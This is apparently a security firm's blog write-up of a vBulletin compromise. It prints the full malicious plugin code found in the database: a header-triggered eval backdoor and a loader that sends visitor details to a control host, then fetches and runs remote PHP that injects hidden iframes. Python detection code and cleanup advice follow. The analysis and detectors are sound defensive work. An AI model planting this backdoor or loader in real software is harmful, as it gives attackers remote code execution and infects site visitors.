There’s a new vBulletin compromise in which visitors who click through to a forum from Google search results are served hidden iframes pointing to various infected domains.  The iframe markup itself is fetched at request time from the host adabeupdate.com rather than stored in any of the forum’s files or templates, which is one reason it is easy to miss.  The end result is that the vBulletin forum is added to Google’s malware blacklist.  Here’s an example of one we worked on today.

We found the malicious code in a plugin named “Forum Runner: Check” with a hook location of “global_start.”  vBulletin stores plugins in the database rather than on disk, and global_start runs on practically every front-end page load, so this code executes on every request without a single forum file being modified.  This was the code:

// Hide all PHP errors so nothing from the injected code shows up on the page.
error_reporting(0);

// Backdoor: any request carrying an "ECMDE" HTTP header has that header's value
// base64-decoded and executed as PHP. This is independent of the iframe injection.
if ($_SERVER['HTTP_ECMDE']) {
    eval(base64_decode($_SERVER['HTTP_ECMDE']));
    return;
}

// Report the visitor's IP, user agent, referer and requested URL to the control
// server, along with a fixed version string.
$str = 'v=10&tt=1&i=' . $_SERVER['REMOTE_ADDR'] . '&a=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&r=' . urlencode($_SERVER['HTTP_REFERER']) . '&f=' . urlencode($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']) . '&dd=4.1.7';
$d = 'front.adabeupdate.com';
$ip = '91.220.173.170';   // fallback if the fetch by hostname fails

// Fetch PHP from the control server, execute it, and capture whatever it prints
// into the "forcehf" template hook so that it is rendered in the page.
ob_start();
$datad = getdata('http://' . $d . '/ss?t=f&' . $str);
if ($datad === false) { $datad = getdata('http://' . $ip . '/ss?t=f&' . $str); }
if (eval($datad) === false) { print $datad; }
$template_hook['forcehf'] = ob_get_contents();
ob_end_clean();

// Try every available way of fetching a URL so the code works regardless of
// the host's PHP configuration (allow_url_fopen, curl, raw sockets).
function getdata($url)
{
    $content = '';
    if (ini_get('allow_url_fopen') == '1' && ($fp = fopen($url, 'r')) !== false) {
        while ($line = fread($fp, 1024)) { $content .= $line; }
        return $content;
    } else if (ini_get('allow_url_fopen') == '1' && ($content = file_get_contents($url)) !== false) {
        return $content;
    } else if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $content = curl_exec($ch);
        curl_close($ch);
        return $content;
    } else if ($content = getRemoteFile($url)) {
        return $content;
    } else { return false; }
}

// Last resort: a hand-rolled HTTP/1.0 GET over a raw socket.
function getRemoteFile($url)
{
    $parsedUrl = parse_url($url);
    $host = $parsedUrl['host'];
    if (isset($parsedUrl['path'])) { $path = $parsedUrl['path']; } else { $path = '/'; }
    if (isset($parsedUrl['query'])) { $path .= '?' . $parsedUrl['query']; }
    if (isset($parsedUrl['port'])) { $port = $parsedUrl['port']; } else { $port = '80'; }
    $response = '';
    $fp = @fsockopen($host, $port, $errno, $errstr, 10);
    if( !$fp || $fp === false) { return false; } else {
        fputs($fp, "GET $path HTTP/1.0\r\n" .
                   "Host: $host\r\n" .
                   "Accept: */*\r\n" .
                   "Accept-Language: en-us,en;q=0.5\r\n" .
                   "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" .
                   "Keep-Alive: 300\r\n" .
                   "Connection: keep-alive\r\n\r\n");
        while ( $line = fread( $fp, 1024 ) ) {
            $response .= $line;
        }
        fclose( $fp );
        // Strip the response headers: everything up to and including the blank line.
        $pos = strpos($response, "\r\n\r\n");
        $response = substr($response, $pos + 4);
    }
    return $response;
}

It’s pretty simple: it fetches PHP from front.adabeupdate.com (falling back to the raw IP 91.220.173.170 if the hostname fails), evals it, and captures whatever that code prints into the forcehf template hook so it is rendered in the forum’s pages.  Because the request carries the visitor’s referer and user agent, the remote server can decide per visitor what to send back, which fits the behaviour above: the injection shows up for visitors arriving from search results and is easy to miss when you browse the forum directly.  Note also the ECMDE header check at the top of the plugin.  That is a separate backdoor that executes any base64-encoded PHP supplied in a request header, so removing only the iframe-fetching code leaves the attacker with a way back in.  In this case the returned code was a hidden iframe pointing to another site (interestingly, running on port 38 or 36).  Example:

<iframe src="http://dgr4.tr************rt.com:38/mean.php" height="0" width="0">
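As an added example (not part of the original write-up), here are the two checks a responder would want for this case, in Python: a triage of rows from vBulletin’s plugin table for the indicators visible in the plugin code above, and a scan of rendered forum HTML for zero-sized or odd-port iframes like the one just shown.  The plugin rows, the benign stand-in plugin, and the sample page are constructed for the example (the stand-in is not the real Forum Runner product’s code), and dgr4.redacted.example takes the place of the redacted domain.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# vBulletin keeps plugins in the `plugin` table (title, hookname, phpcode).
# Constructed rows: the first reproduces the core of the injected plugin
# shown above, the second is a benign stand-in (not real Forum Runner code).
SAMPLE_PLUGINS = [
    {"title": "Forum Runner: Check", "hookname": "global_start", "phpcode": r"""
error_reporting(0);
if ($_SERVER['HTTP_ECMDE']) {
    eval(base64_decode($_SERVER['HTTP_ECMDE']));
    return;
}
$d = 'front.adabeupdate.com';
$ip = '91.220.173.170';
ob_start();
$datad = getdata('http://' . $d . '/ss?t=f&' . $str);
if ($datad === false) { $datad = getdata('http://' . $ip . '/ss?t=f&' . $str); }
if (eval($datad) === false) { print $datad; }
$template_hook['forcehf'] = ob_get_contents();
ob_end_clean();
"""},
    {"title": "Forum Runner: Init", "hookname": "global_start", "phpcode": r"""
if (!defined('FORUMRUNNER')) { require_once(DIR . '/forumrunner/include.php'); }
"""},
]

# Indicators taken from the injected plugin. Either eval pattern is decisive
# on its own; the supporting ones only matter in combination.
CRITICAL = {
    "eval of request data": re.compile(
        r"eval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:SERVER|GET|POST|COOKIE|REQUEST)\s*\["),
    "eval of a variable": re.compile(r"eval\s*\(\s*\$[A-Za-z_]\w*\s*\)"),
}
SUPPORTING = {
    "http:// URL literal": re.compile(r"['\"]https?://", re.I),
    "bare IP literal": re.compile(r"['\"]\d{1,3}(?:\.\d{1,3}){3}['\"]"),
    "template_hook filled from output buffer": re.compile(
        r"\$template_hook\s*\[[^\]]*\]\s*=\s*ob_get_contents\s*\("),
    "error_reporting(0)": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
}

def triage_plugin(row):
    """Return the names of every indicator that fires on one plugin row."""
    code = row["phpcode"]
    return [name for name, rx in {**CRITICAL, **SUPPORTING}.items() if rx.search(code)]

def scan_plugins(rows):
    """Return rows worth a manual look: any critical hit, or two or more supporting hits."""
    flagged = []
    for row in rows:
        hits = triage_plugin(row)
        if any(h in CRITICAL for h in hits) or len(hits) >= 2:
            flagged.append({"title": row["title"], "hookname": row["hookname"], "indicators": hits})
    return flagged

# Constructed forum page: one ordinary visible embed, one injected hidden iframe.
SAMPLE_PAGE = """<html><body>
<div class="post">Welcome to the forum.</div>
<iframe src="https://www.youtube.com/embed/VIDEO_ID" width="560" height="315"></iframe>
<iframe src="http://dgr4.redacted.example:38/mean.php" height="0" width="0"></iframe>
</body></html>"""

class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a page."""
    def __init__(self):
        super().__init__()
        self.iframes = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))

def suspicious_iframes(html, site_host):
    """Flag iframes that are zero-sized or use a non-standard port; note off-site hosts."""
    collector = IframeCollector()
    collector.feed(html)
    hits = []
    for attrs in collector.iframes:
        src = attrs.get("src") or ""
        url = urlsplit(src)
        try:
            port = url.port
        except ValueError:          # garbage after the colon is itself worth a look
            port = -1
        reasons = []
        if attrs.get("width") == "0" or attrs.get("height") == "0":
            reasons.append("zero-sized")
        if port not in (None, 80, 443):
            reasons.append("non-standard port")
        if not reasons:
            continue                # an ordinary visible embed on a normal port
        if url.hostname and url.hostname != site_host:
            reasons.append("off-site")
        hits.append({"src": src, "host": url.hostname, "port": port, "reasons": reasons})
    return hits

if __name__ == "__main__":
    for row in scan_plugins(SAMPLE_PLUGINS):
        print("plugin", row["title"], "on", row["hookname"], "->", ", ".join(row["indicators"]))
    for hit in suspicious_iframes(SAMPLE_PAGE, "forum.example.com"):
        print("iframe", hit["src"], "->", ", ".join(hit["reasons"]))
```

Run the first half against a dump of the plugin table (for example the output of `SELECT title, hookname, phpcode FROM plugin`) and the second against the HTML a search-engine-referred request actually receives, since a direct visit may get a clean page.  The `eval` indicators are what matter: the injected plugin fires both, while the benign stand-in fires nothing.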

We’re not sure yet whether there’s a common attack vector behind this type of infection; the investigation is still ongoing.  If your vBulletin site has this problem, check the plugin list in the admin control panel for unfamiliar entries on the global_start hook, and contact us for help solving it.